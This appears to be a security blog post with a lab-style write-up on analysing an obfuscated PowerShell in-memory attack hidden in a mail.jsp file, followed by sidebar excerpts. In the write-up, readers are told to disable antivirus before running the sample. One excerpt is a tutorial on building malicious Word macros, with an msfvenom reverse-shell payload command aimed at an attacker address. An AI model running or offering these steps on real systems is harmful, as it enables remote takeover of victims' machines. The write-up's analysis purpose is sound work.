In Memory Attack Writeup

For the In-Memory Attack, we are given mail.jsp file. So in order to get a clue about this file, we can open the mail.jsp file in notepad as you can see in Image 1.

Image 1

Based on Image 1, we can see this mail.jsp file has obfuscated powershell codes. In order to analyze the malware, we can run the malware in Windows but only on virtual machines. First, we need to turn of real-time protection in Windows Defender or antivirus. Then we need to open the Windows Powershell as an administrator. Copy and paste the contents of mail.jsp into the Windows Powershell and press enter. After the code is running, you will see Image 2 on the screen. 

Image 2

Then, open Event Viewer to analyze the malware. Click Applications and Services Logs > Microsoft > Windows > Powershell > Operational. From here we can see all the running events in the powershell as in Image 4. 
Image 4

Click the latest event where the task is executing a remote command. Then, we can copy the scripblock text into a notepad to make it easier to analyze it as seen in Image 5. 

Image 5




Comments

Post a Comment

Popular posts from this blog

How to Create Malware Docs using Macro

Image
What is Macro? According to Microsoft , a macro is a series of commands and instructions that you group together as a single command to accomplish a task automatically.  You can automate frequently used tasks by creating and running macros in Word and Excel.  For this method, we will be using  1. Kali Linux 2. Metasploit 3. Word ***Note: This is for education purposes only Steps 1.      First, we must first create a payload. MSFvenom will be used to build the payload. For this demonstration, we used the reverse http payload. We will use the command  msfvenom -p windows/meterpreter/reverse_https lhost=192.168.1.106 lport=1234 -f vba .   For lhost,we stated the Attacker Machine's local IP address, which is Kali Linux. For lhost,we must also include a Local port on which the session will be created.  2.     Then, w e copy the vba payload content after generating the payload with the correct configuration for the vba payload and then pass on to the target computer as you can see in Ima
Read more

OvertheWire

Image
Bandit Level 0  Level Goal The goal of this level is for you to log into the game using SSH. The host to which you need to connect is bandit.labs.overthewire.org, on port 2220. The username is bandit0 and the password is bandit0. Once logged in, go to the Level 1 page to find out how to beat Level 1. Solution Use command ssh bandit0@bandit.labs.overthewire.org -p 2220 to log into the game.  Bandit Level 0 → Level 1 Level Goal The password for the next level is stored in a file called readme located in the home directory. Use this password to log into bandit1 using SSH. Whenever you find a password for a level, use SSH (on port 2220) to log into that level and continue the game. Solution Use command  ls  to displays a list of the names of all files in the current working directory.  Then use command  cat  to display the content of the readme file. The password is  boJ9jbbUNNfktd78OOpsqOltutMc3MY1 . After the password for the next level is found, use the command  ssh bandit1@bandit.labs
Read more